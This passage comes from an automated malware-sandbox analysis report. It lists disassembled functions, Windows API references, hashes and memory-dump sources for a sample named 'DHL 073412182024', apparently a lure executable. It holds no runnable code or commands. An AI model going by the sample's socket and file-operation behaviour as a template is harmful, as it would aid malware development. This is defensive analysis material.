                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: b7d8db60c340c08e8eb165e9e1e5dfc2577573e5afef702e51c3041ba3f36b8b
                                                                                      • Instruction ID: 4a6fd77b6d6a6b18b4e3f670252b9d1bf0984b79ab2d24263efac108ba5de3b0
                                                                                      • Opcode Fuzzy Hash: b7d8db60c340c08e8eb165e9e1e5dfc2577573e5afef702e51c3041ba3f36b8b
                                                                                      • Instruction Fuzzy Hash: 7651AE70A00649AFDB11CFA8EC45AEEBBF9EF09300F14415AE555E7395D630DA81CB60
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00DC2D4B
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00DC2D53
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00DC2DE1
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00DC2E0C
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00DC2E61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: a7445edbf51ce3c6d2dbcd95f80d5f60b28baf17950d482fb67c520bb424c66a
                                                                                      • Instruction ID: 778b62b473353002f5eb839eda02c4147b1226dc5b9ace40435a2ec5a37f627b
                                                                                      • Opcode Fuzzy Hash: a7445edbf51ce3c6d2dbcd95f80d5f60b28baf17950d482fb67c520bb424c66a
                                                                                      • Instruction Fuzzy Hash: 28418134A0020AABCF10DF68C845FAEBBA5FF55324F188159F9156B252DB31EA05CBF1
                                                                                      APIs
                                                                                        • Part of subcall function 00E2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E2307A
                                                                                        • Part of subcall function 00E2304E: _wcslen.LIBCMT ref: 00E2309B
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E21112
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E21121
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E211C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 00E211F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2675159561-0
                                                                                      • Opcode ID: dbca00127d6a34a2fb841c096f40a62c0c5bcf1e711ff291d654aa381fe98e20
                                                                                      • Instruction ID: 52f669e3c085d3d66f8671a6c0333e4e57e2106a5fe5a72ca8badd0fa9c2fcb8
                                                                                      • Opcode Fuzzy Hash: dbca00127d6a34a2fb841c096f40a62c0c5bcf1e711ff291d654aa381fe98e20
                                                                                      • Instruction Fuzzy Hash: 6C411831601228AFDB109F24D844BA9BBE9FF85328F148099FD05BB291C770EE45CBE1
                                                                                      APIs
                                                                                        • Part of subcall function 00E0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E0CF22,?), ref: 00E0DDFD
                                                                                        • Part of subcall function 00E0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E0CF22,?), ref: 00E0DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E0CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E0CF7F
                                                                                      • _wcslen.LIBCMT ref: 00E0D005
                                                                                      • _wcslen.LIBCMT ref: 00E0D01B
                                                                                      • SHFileOperationW.SHELL32(?), ref: 00E0D061
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 3164238972-1173974218
                                                                                      • Opcode ID: 3a9504cad72fe1312eb1f83a1d239521210d3de917fd76b57e3233d013e84ad5
                                                                                      • Instruction ID: f031cc98aa5e99ba9a4c7288b11c2e35c4d1dd625c87968f80e4485c4b51c5df
                                                                                      • Opcode Fuzzy Hash: 3a9504cad72fe1312eb1f83a1d239521210d3de917fd76b57e3233d013e84ad5
                                                                                      • Instruction Fuzzy Hash: BC4158B19452195FDF12EBA4DD81EDEB7F9EF04380F1010E6E505FB181EA34A688CB61
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E32E1C
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E32E4F
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E32E84
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E32EB6
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E32EE0
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E32EF1
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E32F0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 2178440468-0
                                                                                      • Opcode ID: b46a722781154c4b8745fdf7825f7d36322940c19bdb8877edd057b954956666
                                                                                      • Instruction ID: 30381024d6379854b9e2bb0e504514c500ff6fcea494283ebdbbedc80b65d1db
                                                                                      • Opcode Fuzzy Hash: b46a722781154c4b8745fdf7825f7d36322940c19bdb8877edd057b954956666
                                                                                      • Instruction Fuzzy Hash: 673128316042549FDB22CF1ADC8AF653BE0FB8AB14F1511A8FA44AF2B1CB71E844DB41
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E07769
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E0778F
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E07792
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00E077B0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00E077B9
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E077DE
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00E077EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: e733d083d2cc72e68b115ae822e9d1ed31712cbd69959cbfd7d536fa4098b8d4
                                                                                      • Instruction ID: 4bb567fc0e5cec630d7fe5c8cd8be34ab4c9087d5ec0afa93fb722d1f9670b38
                                                                                      • Opcode Fuzzy Hash: e733d083d2cc72e68b115ae822e9d1ed31712cbd69959cbfd7d536fa4098b8d4
                                                                                      • Instruction Fuzzy Hash: 6221A176A04219AFDB10DFA9CC88CBB77ACEB093A47148026BA55FB190D670EC85C760
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E07842
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E07868
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E0786B
                                                                                      • SysAllocString.OLEAUT32 ref: 00E0788C
                                                                                      • SysFreeString.OLEAUT32 ref: 00E07895
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E078AF
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00E078BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: c932d107ba792093f1df3df5566198f8fe5cb6534845d58bdc118260684c7b74
                                                                                      • Instruction ID: b288ee382fdfd823d059b5578e8634318ee0365ebfe01f899b2ca2b69d8ef282
                                                                                      • Opcode Fuzzy Hash: c932d107ba792093f1df3df5566198f8fe5cb6534845d58bdc118260684c7b74
                                                                                      • Instruction Fuzzy Hash: 75219232A04218AFDB149FA9DC8CDBA77ACEB083647108125F955EB2A1D670EC85CB74
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E104F2
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E1052E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 3daeaaff547eb69c9ab893a29c3aae6515085118ed3c748fba0199a98fbcd399
                                                                                      • Instruction ID: 4aaf4687e1a627723f5fa9157a6c3d59741fef9767d0496622c792699c59ff40
                                                                                      • Opcode Fuzzy Hash: 3daeaaff547eb69c9ab893a29c3aae6515085118ed3c748fba0199a98fbcd399
                                                                                      • Instruction Fuzzy Hash: 1C212C75500309AFDB309F69D848ADA7BF5AF44768F205A19E8A1F62E0D7B0D9D4CF20
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E105C6
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E10601
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 0adcceb5a0e3f783f22e2dac33e59c3189a848958f7ca74da6f1833d5958a5d7
                                                                                      • Instruction ID: 1301f7935bfdcc9f99133dab5ff750b27307313ede89e4be73ef2ddb311d1ef2
                                                                                      • Opcode Fuzzy Hash: 0adcceb5a0e3f783f22e2dac33e59c3189a848958f7ca74da6f1833d5958a5d7
                                                                                      • Instruction Fuzzy Hash: C92151755003059FDB209F699C48ADAB7E4AF95724F205A19F8B1F72E0D7F099E0CB60
                                                                                      APIs
                                                                                        • Part of subcall function 00DA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA604C
                                                                                        • Part of subcall function 00DA600E: GetStockObject.GDI32(00000011), ref: 00DA6060
                                                                                        • Part of subcall function 00DA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA606A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E34112
                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E3411F
                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E3412A
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E34139
                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E34145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                      • String ID: Msctls_Progress32
                                                                                      • API String ID: 1025951953-3636473452
                                                                                      • Opcode ID: c42877c025522b7dbbe392b988444fb32998f9670cfa49faee5142186284917b
                                                                                      • Instruction ID: 8b47d2cee95e71f6f0afaadcd873ff39a640bc33afef538fdb849d5aff33e178
                                                                                      • Opcode Fuzzy Hash: c42877c025522b7dbbe392b988444fb32998f9670cfa49faee5142186284917b
                                                                                      • Instruction Fuzzy Hash: 881190B2140219BEEF118E64CC86EE77FADEF08798F015111FA18B2090CA72DC61DBA4
                                                                                      APIs
                                                                                        • Part of subcall function 00DDD7A3: _free.LIBCMT ref: 00DDD7CC
                                                                                      • _free.LIBCMT ref: 00DDD82D
                                                                                        • Part of subcall function 00DD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000), ref: 00DD29DE
                                                                                        • Part of subcall function 00DD29C8: GetLastError.KERNEL32(00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000,00000000), ref: 00DD29F0
                                                                                      • _free.LIBCMT ref: 00DDD838
                                                                                      • _free.LIBCMT ref: 00DDD843
                                                                                      • _free.LIBCMT ref: 00DDD897
                                                                                      • _free.LIBCMT ref: 00DDD8A2
                                                                                      • _free.LIBCMT ref: 00DDD8AD
                                                                                      • _free.LIBCMT ref: 00DDD8B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction ID: 34a6ddbd800b5b5fb21c6e7e8ef0f9a65db9229ca9f0862d04dfa91f9c318e9d
                                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction Fuzzy Hash: FD112971580B04BADA31BFB0CC46FDB7B9DEF10700F400826B29EA6292DB75A5059A70
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E0DA74
                                                                                      • LoadStringW.USER32(00000000), ref: 00E0DA7B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E0DA91
                                                                                      • LoadStringW.USER32(00000000), ref: 00E0DA98
                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0DADC
                                                                                      Strings
                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E0DAB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                      • API String ID: 4072794657-3128320259
                                                                                      • Opcode ID: 836b4c79c6b6522373f6ef8cfaee8bebe5efb830618a85352ba41db2224f720f
                                                                                      • Instruction ID: 2f6b50a392f14208ea47b297e9ab47da16c500a168333c1a70a53aa9d7537eb8
                                                                                      • Opcode Fuzzy Hash: 836b4c79c6b6522373f6ef8cfaee8bebe5efb830618a85352ba41db2224f720f
                                                                                      • Instruction Fuzzy Hash: 90014FF25002087FE7109BA19D8DEE6766CE708701F501496B746F2081EA74DE888F74
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(00FCED18,00FCED18), ref: 00E1097B
                                                                                      • EnterCriticalSection.KERNEL32(00FCECF8,00000000), ref: 00E1098D
                                                                                      • TerminateThread.KERNEL32(00000029,000001F6), ref: 00E1099B
                                                                                      • WaitForSingleObject.KERNEL32(00000029,000003E8), ref: 00E109A9
                                                                                      • CloseHandle.KERNEL32(00000029), ref: 00E109B8
                                                                                      • InterlockedExchange.KERNEL32(00FCED18,000001F6), ref: 00E109C8
                                                                                      • LeaveCriticalSection.KERNEL32(00FCECF8), ref: 00E109CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3495660284-0
                                                                                      • Opcode ID: 8041ec63efdf05dd96a93aea411438c5f5ea28115bf1b3755e987f33a054c5d4
                                                                                      • Instruction ID: 1f4bffd487e5bbc5fa145bfa47e1850a17bd0de82ec440cb42d3f90b08a8c5e7
                                                                                      • Opcode Fuzzy Hash: 8041ec63efdf05dd96a93aea411438c5f5ea28115bf1b3755e987f33a054c5d4
                                                                                      • Instruction Fuzzy Hash: 0EF01D31442906AFD7415B95EE8CAD67A35BF45702F502015F101708B1C7B5D4B9CF90
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 00DA5D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 00DA5D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 00DA5D99
                                                                                      • GetClientRect.USER32(?,?), ref: 00DA5ED7
                                                                                      • GetWindowRect.USER32(?,?), ref: 00DA5EF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      • Opcode ID: dbbedd2deb6ffd2d9ba52bdafbb9bdb2e17e623e159896302083361e6056c312
                                                                                      • Instruction ID: 9b5bf2fd2f92daefaad355a7f428a7e7b00b830da22dc6ca21138a673ce5aac0
                                                                                      • Opcode Fuzzy Hash: dbbedd2deb6ffd2d9ba52bdafbb9bdb2e17e623e159896302083361e6056c312
                                                                                      • Instruction Fuzzy Hash: 89B17A35A0068ADBDB10DFA9C4807EEB7F1FF58310F14841AE8A9E7254DB30EA51DB64
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 00DD00BA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD00D6
                                                                                      • __allrem.LIBCMT ref: 00DD00ED
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD010B
                                                                                      • __allrem.LIBCMT ref: 00DD0122
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD0140
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1992179935-0
                                                                                      • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
